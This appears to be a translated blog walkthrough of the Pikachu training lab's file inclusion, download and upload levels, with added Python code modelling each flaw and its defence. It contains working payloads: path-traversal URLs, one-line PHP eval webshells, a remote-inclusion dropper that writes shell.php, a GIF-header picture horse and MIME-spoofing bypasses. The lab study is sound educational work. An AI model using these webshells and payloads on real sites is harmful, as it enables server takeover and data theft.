Pikachu: file inclusion / download / upload

Table of contents

1. File Inclusion (file inclusion vulnerability)
   1 Overview
   2. File Inclusion (local)
   3. File Inclusion (remote)
2. Unsafe file download
   1 Overview
   2. unsafedownload
3. Unsafe file upload
   1 Overview
   2. Client check
   3. Server check
   4. getimagesize()


1. File Inclusion (file inclusion vulnerability)

1 Overview

        File inclusion is a language feature. Most development languages provide built-in file inclusion functions that let a developer pull another code file directly into the current one. PHP provides:
include(), include_once()
require(), require_once()

  • require(): raises a fatal error and stops the script if the included file cannot be found.
  • include(): only emits a warning if the included file cannot be found; the script keeps running.
  • include_once(): same as include(), except that a file that has already been included is not included again.
  • require_once(): same as require(), except that a file that has already been included is not included again.

These inclusion functions are used constantly in application code.

Vulnerability cause

        include() does not care what type of file it is given: whatever the extension, any PHP code inside the file is parsed and executed. So if the site has a file inclusion vulnerability, a .jpg file that contains PHP code is executed as PHP.

        Most of the time the file passed to the inclusion function is hard-coded, and there is no security issue. Sometimes, however, the file name is a variable, and that variable can be supplied by the front-end user. If it is not handled carefully, the result is a file inclusion vulnerability: the attacker points the inclusion function at an "unexpected" file, and the code in it runs. Depending on the configuration, this comes in two forms:

1.1 Local file inclusion (LFI): only files already on the server can be included. Since the attacker does not normally control the server's files, the usual targets are fixed system or configuration files, which leaks sensitive information. Very often an LFI is combined with a file upload vulnerability (upload a file containing PHP code, then include it) for far greater impact.
1.2 Remote file inclusion (RFI): a file can be included from a URL, so the attacker can supply arbitrary code. In PHP this additionally requires allow_url_include=On, which is off by default.

So when designing a web application, try not to let front-end users pass variables into an inclusion function at all. If it is unavoidable, apply a strict whitelist of the permitted values.

How to defend

1. Filter dangerous characters (e.g. with str_replace); on its own this is weak, so combine it with the whitelist below.

2. Configure open_basedir to restrict the directories PHP may read from, which limits directory traversal.

3. Upgrade PHP (5.3.4 or later) so that %00 null-byte truncation of the path no longer works.

4. Rename uploaded files so an attacker cannot predict the path to include.

5. Use a whitelist for dynamically included files; anything not on the list is never included.

6. Separate administrator privileges properly and manage file permissions.

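The following is an added example, not code from the Pikachu project. It models in Python the include "include/" . $filename pattern that the walkthrough's error messages reveal (the directory layout and the allowed file names file1.php to file5.php are assumptions), and puts a whitelist resolver next to it. classify() labels the parameter the way a WAF rule or a log review would, so the same payloads used later in the walkthrough (../kiss.txt, the win.ini path, the uploaded picture horse, a remote URL) can be seen being refused.

```python
import os
import re
from typing import Optional

# Assumed layout mirroring the walkthrough: fi_local.php sits in .../fileinclude and
# the include() call builds its path as "include/" + the filename parameter.
BASE_DIR = os.path.abspath("www/pikachu/vul/fileinclude")
INCLUDE_DIR = os.path.join(BASE_DIR, "include")

# The only values the drop-down can legitimately send (assumed: file1.php .. file5.php).
ALLOWED = {f"file{i}.php" for i in range(1, 6)}


def vulnerable_resolve(filename: str) -> str:
    """Equivalent of include "include/$filename": the parameter is concatenated unchecked.

    Everything the walkthrough exploits (../kiss.txt, win.ini, the uploaded picture horse)
    follows from this one concatenation.
    """
    return os.path.normpath(os.path.join(INCLUDE_DIR, filename))


def classify(filename: str) -> str:
    """Label an inclusion parameter the way a WAF rule or a log review would."""
    if "\x00" in filename:
        return "null-byte"      # %00 truncation (works only on PHP < 5.3.4)
    if filename.lower().startswith(("php://", "data:", "phar://")):
        return "wrapper"        # PHP stream wrappers (php://filter, data:, ...)
    if filename.startswith(("/", "\\")) or re.match(r"^[A-Za-z]:[\\/]", filename):
        return "absolute"       # e.g. C:/../../../../windows/win.ini
    if re.match(r"^[A-Za-z][A-Za-z0-9+.-]*://", filename):
        return "remote"         # http://, https://, ftp:// (RFI, needs allow_url_include)
    if ".." in filename.replace("\\", "/").split("/"):
        return "traversal"      # ../kiss.txt, ../../unsafeupload/uploads/...
    return "plain"


def hardened_resolve(filename: str) -> Optional[str]:
    """Whitelist first, then a containment check as defence in depth.

    Returns the absolute path to include, or None to refuse.
    """
    if filename not in ALLOWED:
        return None
    resolved = os.path.realpath(os.path.join(INCLUDE_DIR, filename))
    root = os.path.realpath(INCLUDE_DIR)
    # realpath() collapses ../ and symlinks; the result must still live under include/
    if os.path.commonpath([resolved, root]) != root:
        return None
    return resolved


if __name__ == "__main__":
    samples = [
        "file1.php",
        "file6.php",
        "../kiss.txt",
        "C:/../../../../windows/win.ini",
        "../../unsafeupload/uploads/2022/12/30/64272863ae5dff2699f401247946.jpg",
        "https://www.csdn.net/",
        "file1.php\x00.jpg",
    ]
    for p in samples:
        print(f"{p!r:75} {classify(p):10} hardened -> {hardened_resolve(p)}")
```

The whitelist, not the containment check, is what actually fixes the level: file6.php is inside include/ and would pass any path check, yet the drop-down never sends it, so the resolver refuses it.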
2. File Inclusion (local)

The level presents a drop-down box of NBA stars. Choose Kobe and a picture plus a short profile appears.

 URL

http://127.0.0.1/pikachu/vul/fileinclude/fi_local.php?filename=file1.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2#

The URL carries a file name, file1.php, which is probably what gets included. Because it travels from the front end to the back end as a URL parameter, the user controls it; if it is not strictly filtered, there is a file inclusion vulnerability.

Trying the other NBA stars gives file2.php through file5.php.

1.1 Read hidden files

Brute-force the file number with Burp Suite (Intruder).

 Mark the digit after "file" as the payload position

 Use a number dictionary from 6 to 100

 Sorting the results by response length shows four distinct lengths, corresponding to file6.php, file7.php, file14.php and file100.php

file6.php is a hidden file containing a username and password.

file7.php returns an error, and file14.php and file100.php produce the same error message. From this error we learn that fi_local.php uses include() to include the file, and that the included path is built from the include folder that sits in the same directory as fi_local.php.

The error also discloses the path D:\Users\phpstudy_pro\WWW\pikachu\vul\fileinclude

1.2 Read files in other folders

Upload a file with PHP code inside it, saved with a .txt extension (kiss.txt, placed one level above include/, i.e. in the fileinclude directory).

Because the parameter is appended to include/ (file6.php actually lives in the include folder), the file is not found directly; use ../ to go up one directory first:

http://127.0.0.1/pikachu/vul/fileinclude/fi_local.php?filename=../kiss.txt&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

 1.3 Read system files

Every Windows system has C:\Windows\win.ini, so use it to confirm the file inclusion vulnerability.

Using the fi_local.php location leaked in the error message, a relative path such as C:/../../../../windows/win.ini reaches the file; substitute it into the URL to form the payload:

http://127.0.0.1/pikachu/vul/fileinclude/fi_local.php?filename=C:/../../../../windows/win.ini&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

 1.4 Combined with file upload: getshell

In the getimagesize level of Pikachu's Unsafe Fileupload, a "picture horse" (an image file with a one-line webshell appended) was uploaded. The upload renamed it to 41634263ae58e27421b852355994.jpg; its content contained the one-line webshell shown in the figure below.

Forge a picture.jpg

 Upload w.jpg; the page echoes part of the path and the newly generated image file name

 Combine this with the inclusion directory to get the payload:

127.0.0.1/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2022/12/30/64272863ae5dff2699f401247946.jpg&submit=提交查询

Visit the inclusion URL

 Connect with AntSword

Connection succeeded!

3. File Inclusion (remote)

In a remote inclusion vulnerability the attacker loads code from an external address. (In PHP this requires allow_url_include=On in php.ini.)

 Here the URL carries the complete argument of the include() call, including the include/ prefix, so nothing is prepended on the server side:

http://127.0.0.1/pikachu/vul/fileinclude/fi_remote.php?filename=include%2Ffile1.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2#

Try including a remote HTTP(S) address:

http://127.0.0.1/pikachu/vul/fileinclude/fi_remote.php?filename=https://www.csdn.net/&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2#

 So in this level, in addition to remote file inclusion, absolute paths work for local file inclusion.

Write a one-line payload that drops a webshell when it is included, and host it as shell.txt:

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[123])  ?> '); ?>

Including it shows nothing on the page,

 but looking at the directory of fi_remote.php shows that shell.php has been generated (PHP's working directory is normally the directory of the requested script, so that is where fopen writes).

Replace shell.txt in the URL with shell.php to reach the new webshell

 Connection succeeded!

2. Unsafe file download (file download)

1 Overview

    Many web systems offer a file download feature. Clicking a download link sends a request to the back end that usually carries the name of the file to download; the back end runs its download code and returns the file matching that name to the browser. If the back end takes the requested file name and concatenates it straight into the download path without any security check, the result is an unsafe file download vulnerability.
An attacker who submits a carefully built path (such as ../../../etc/passwd) instead of the expected file name will very likely get that file served directly, leaking back-end secrets (password files, source code, and so on).

So when the downloaded file is chosen by the front end, the incoming value must be validated before use. Remember: nothing that comes from the front end is trustworthy.

Vulnerability principle

The application exposes a download feature that takes a file name parameter

The implementation reads files with a file-reading function

The front-end user's request to read a file is not controlled, or only loosely controlled (no restriction or validation)

The content of the requested file is returned to the front end for download

Vulnerability impact

Any file on the server can be downloaded:

  • Obtain the site's web source code and audit it to find further vulnerabilities

  • Obtain configuration files of the site, server, system, database and other middleware

  • Obtain application and system configuration files

  • Probe information about the intranet

  • Download .log files and look in them for admin back-end addresses, file upload endpoints, etc.

Defense

  •     Sanitize the data: normalize the encoding of the user-supplied file name, enforce a whitelist of file types, and reject parameters containing malicious characters or null bytes.
  •     Arbitrary file download can also come from an outdated middleware version (e.g. IBM WebSphere has had such a vulnerability); fix it by patching the middleware.
  •     Store the address of downloadable files in the database.
  •     Store file paths in the database and have the user submit an ID; the server maps the ID to the file.
  •     Check the user's permission before serving a file, and restrict readable directories with open_basedir.
  •     Keep the files in a directory the web server cannot serve directly.
  •     Reject ../ so directory traversal is impossible.
  •     Public files can be placed in the web application's download directory and served by direct link.
     
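The following is an added example, not code from the Pikachu project. It models in Python the "download/" . $filename concatenation that the unsafedownload level uses (directory layout assumed), then shows the two defences from the list above: accepting only a bare file name and proving the resolved path stays inside download/, and ID indirection, where the client never names a file at all. The traversal and absolute-path payloads used against the level are the test inputs.

```python
import os
import secrets
from typing import Dict, Optional

# Assumed layout mirroring the level: execdownload.php lives in .../unsafedownload and
# builds its path as "download/" + the filename parameter.
APP_DIR = os.path.realpath("www/pikachu/vul/unsafedownload")
DOWNLOAD_DIR = os.path.join(APP_DIR, "download")


def vulnerable_path(filename: str) -> str:
    """Equivalent of $file_path = "download/{$filename}" with no check at all."""
    return os.path.normpath(os.path.join(DOWNLOAD_DIR, filename))


def resolve_within(filename: str) -> Optional[str]:
    """Accept a bare file name only, and prove the resolved path stays inside download/."""
    # A file name must be exactly one path component: no separators, no drive letters.
    if (filename != os.path.basename(filename) or "\\" in filename or ":" in filename
            or filename in ("", ".", "..")):
        return None
    candidate = os.path.realpath(os.path.join(DOWNLOAD_DIR, filename))
    if os.path.commonpath([candidate, DOWNLOAD_DIR]) != DOWNLOAD_DIR:
        return None     # a symlink or normalisation escaped the directory
    return candidate


class FileRegistry:
    """Indirection: the client submits an opaque ID, the server keeps the real path."""

    def __init__(self) -> None:
        self._files: Dict[str, str] = {}

    def register(self, filename: str) -> str:
        path = resolve_within(filename)
        if path is None:
            raise ValueError(f"refusing to register {filename!r}")
        file_id = secrets.token_urlsafe(12)   # unguessable, carries no path information
        self._files[file_id] = path
        return file_id

    def lookup(self, file_id: str) -> Optional[str]:
        # Whatever the client sends is only ever used as a dictionary key.
        return self._files.get(file_id)


if __name__ == "__main__":
    payloads = ["kb.png", "../123.txt", "/etc/passwd",
                r"D:\Users\phpstudy_pro\WWW\pikachu\vul\unsafedownload/123.txt"]
    for p in payloads:
        print(f"{p!r:65} vulnerable -> {vulnerable_path(p)}")
        print(f"{'':65} hardened   -> {resolve_within(p)}")
    registry = FileRegistry()
    kobe = registry.register("kb.png")
    print("id", kobe, "->", registry.lookup(kobe))
```

The registry also gives a natural place for the permission check from the defence list: look up who may fetch a given ID before returning its path.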

2. unsafedownload

Click an avatar to download the picture

 It downloads directly, with no redirect and no change to the URL.

Right-click to view the page source

Search the source for a player's name to find the relevant code

Links of the form <a href="execdownload.php?filename=kb.png">Kobe Bryant</a> are the download points

Append execdownload.php?filename= to the current page's path, followed by the path of the file we want:

payload: 127.0.0.1/pikachu/vul/unsafedownload/execdownload.php?filename=../123.txt

An absolute path does not work:

127.0.0.1/pikachu/vul/unsafedownload/execdownload.php?filename=D:\Users\phpstudy_pro\WWW\pikachu\vul\unsafedownload/123.txt

The reason is that line 10 of execdownload.php prepends the download/ directory to the parameter.

If download/ is deleted from that line,

the file can then be downloaded by absolute path as well.

3. Unsafe file upload (file upload)

1 Overview

        File upload is very common in web applications: many sites need avatar uploads at registration, attachment uploads, and so on. When the user clicks upload, the back end checks the file (type, extension, size, etc.), renames it according to some scheme and stores it in a designated directory. If the back end does no security check on the uploaded file, or its checks are not strict enough, an attacker can upload a malicious file such as a one-line webshell and the server is webshelled.

So the upload feature must treat incoming files with strict suspicion. For example:
--Verify the file type, extension and size;
--Verify how the file is uploaded;
--Rename the file;
--Do not expose the path after upload;
--Etc...

1. Black-box discovery

Admin back end

​ Getting into the site's back end does not by itself give control of the site, but upload features in the back end are a way to get it

Member centre

​ Avatar / picture upload

Scanning

​ Use tools to scan for the back-end path and upload points

2. White-box discovery

​ Find upload vulnerabilities by code analysis

​ Locate the file upload function
How to defend against file upload

    Isolate uploaded files from the web service
    Use whitelist filtering to limit the permitted file types
    Make the upload directory non-executable
    Check the upload path
    Detect with built-in functions and custom functions
    Re-render images
    Rename uploaded files
    Compress file content
    Check file contents

File upload bypass methods

    File inclusion bypass
    Front-end restriction bypass
    File extension bypass
    ashx upload bypass
    Special file name bypass
    00 truncation bypass
    .htaccess parsing vulnerability
    MIME type restriction bypass
    Parsing vulnerability bypass
    Race condition bypass
    Content-Length bypass


2. Client check

        The extension of the uploaded file is checked by a JavaScript script in the front end, which restricts the file types via a blacklist or whitelist. This check is very insecure and trivial to bypass: intercept and modify the request, or simply disable JavaScript in the browser.

Only images are allowed to be uploaded.

Write a one-line webshell

Either disable the browser's JavaScript or capture the request with Burp.

Disable browser JavaScript (no Firefox plug-in was found for it)

so do it this way:

Enter about:config in the URL bar

Type JavaScript in the search box, find javascript.enabled and set it to false

 Uploading the php file a second time now succeeds directly.

Upload and capture the request with Burp

Burp capture

Change the .jpg extension to .php

  The upload succeeds, and the file is saved at uploads/w.php (in many real cases the save path is not returned and has to be brute-forced or guessed)

Visiting the path shows the GIF89a file header of our one-line webshell, proving it is reachable.

http://127.0.0.1/pikachu/vul/unsafeupload/uploads/w.php

 Connect with AntSword

Connection succeeded!

The code

Viewed in F12: it is a whitelist filter, but a whitelist that lives in the front end is useless.

 3. Server check

The server inspects the Content-Type field of the uploaded data to decide whether it is one of the permitted formats.

Uploading a php file gives a pop-up: only jpg, jpeg, png are allowed

 Upload a jpg file; it is saved under the same upload path

A jpg file cannot be connected with AntSword, though

Look at the captured request; the key part is here

 We need to change .jpg to .php, and set the Content-Type to image/jpeg (or image/png); otherwise the upload fails.

 image/jpeg: succeeds

  image/php: fails

  image/php with file.jpg: also fails

AntSword connection

The code

The MIME type is carried in the Content-Type field of the HTTP request.

 $mime is an array of legal MIME types, i.e. the MIME whitelist; it is passed to upload_sick() for the server-side check.

upload_sick() is defined as follows. Its insecurity lies in two points:

(1) Only the MIME type is checked, and it comes from the client, so it is bypassed by editing the captured request.

(2) The file is not renamed when saved, so even if the page did not echo the save path, an attacker could very likely guess it.

A further weakness in this level is that the save path is echoed.

With the webshell uploaded and the save path known, the attacker connects to the shell.

 4. getimagesize()

getimagesize() returns the size and related information of an image: an array on success, or FALSE plus an E_WARNING on failure.
It determines the size of any GIF, JPG, PNG, SWF, SWC, PSD, TIFF, BMP, IFF, JP2, JPX, JB2, JPC, XBM or WBMP image file and returns the dimensions together with the file type and the image height and width.

Uploading a php file: the extension appears to be filtered.

So it should not be possible to bypass by editing the captured request in Burp. Try it.

Sure enough, it fails.

 Since only image formats can be uploaded, forge an image header and append a one-line webshell. The file is still not parsed or run as PHP, so it can only be exploited together with a file inclusion vulnerability, which is exactly what the file inclusion section above did.

The code

This is the safest of the three levels: php files cannot be uploaded, and exploitation needs a file inclusion vulnerability (or a middleware parsing vulnerability), but it is still not safe enough.

The main remaining weakness is that the uploaded file can still contain PHP code.

The level first defines two whitelists, $_type for file name extensions and $_mime for MIME types, then passes both whitelists and some other parameters to upload()

upload() is defined as follows, and its main filtering steps are:

(1) Lines 123~127: filter out files whose extension is not in the extension whitelist $type

(2) Lines 130~134: filter out files whose MIME type is not in the MIME whitelist $mime

(3) Lines 136~140: use getimagesize() to check that the file is a real picture (bypassed by a picture horse)

(4) Lines 157~161: rename the file to a random value (meant to stop attackers guessing the path, but since the save path is echoed on the page this renaming is useless)

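The following is an added example, not code from the Pikachu project. It models in Python the three server-side checks of the Client check, Server check and getimagesize() levels (names level_client_check, level_mime_check and level_getimagesize_check are mine, and the magic-byte lookup stands in for getimagesize()), builds the picture horse used in the LFI section, and shows which check each bypass in this section defeats. hardened_accept() is one way to close the gap the analysis identifies: the stored file can no longer carry PHP code, and its name and extension come from the server, not the client.

```python
import re
import secrets
from dataclasses import dataclass
from typing import Optional


# One multipart file part as the server sees it. Every field is chosen by the client.
@dataclass
class Upload:
    filename: str       # filename= in Content-Disposition
    content_type: str   # Content-Type of the part
    data: bytes


ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
ALLOWED_MIME = {"image/jpeg", "image/png", "image/gif"}
# Magic bytes that a getimagesize()-style check recognises (subset, assumed).
MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
WEBSHELL = b"<?php @eval($_POST['cmd']); ?>"   # the one-line webshell used throughout


def extension(name: str) -> str:
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def image_type(data: bytes) -> Optional[str]:
    """Stand-in for getimagesize(): identify the file by its header only."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


# Level 1: the whitelist lives in front-end JS, so the server accepts anything.
def level_client_check(u: Upload) -> bool:
    return True


# Level 2 (upload_sick): only the client-supplied Content-Type is checked.
def level_mime_check(u: Upload) -> bool:
    return u.content_type in ALLOWED_MIME


# Level 3 (getimagesize): extension whitelist + MIME whitelist + image header.
def level_getimagesize_check(u: Upload) -> bool:
    return (extension(u.filename) in ALLOWED_EXT
            and level_mime_check(u)
            and image_type(u.data) is not None)


def make_picture_horse(shell: bytes = WEBSHELL) -> bytes:
    """A GIF89a header followed by PHP: passes header checks, runs when include()d."""
    return b"GIF89a" + shell


def hardened_accept(u: Upload) -> Optional[str]:
    """Return the server-chosen name to store the file under, or None to reject."""
    kind = image_type(u.data)
    if kind is None or extension(u.filename) not in ALLOWED_EXT:
        return None
    # A picture horse is still an image to getimagesize(); refuse PHP open tags in the body.
    # (Heuristic: a real fix also re-encodes the image and disables PHP in the upload dir.)
    if re.search(rb"<\?", u.data):
        return None
    # Random name, extension taken from the content, never from the client; do not echo it.
    return f"{secrets.token_hex(16)}.{kind}"


if __name__ == "__main__":
    raw_shell = Upload("w.php", "application/x-php", WEBSHELL)
    spoofed = Upload("w.php", "image/jpeg", WEBSHELL)            # Burp: Content-Type edited
    horse = Upload("w.jpg", "image/jpeg", make_picture_horse())   # forged header + shell
    for name, u in [("raw .php", raw_shell), ("spoofed MIME", spoofed), ("picture horse", horse)]:
        print(f"{name:14} L1={level_client_check(u)!s:5} L2={level_mime_check(u)!s:5} "
              f"L3={level_getimagesize_check(u)!s:5} hardened={hardened_accept(u)}")
```

Note what hardened_accept() does not fix on its own: an uploaded file that is served from the web root with PHP execution enabled is still dangerous to include, which is why the defence list above also wants uploads isolated from the web service and the upload directory made non-executable.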

Origin blog.csdn.net/m0_65712192/article/details/128490557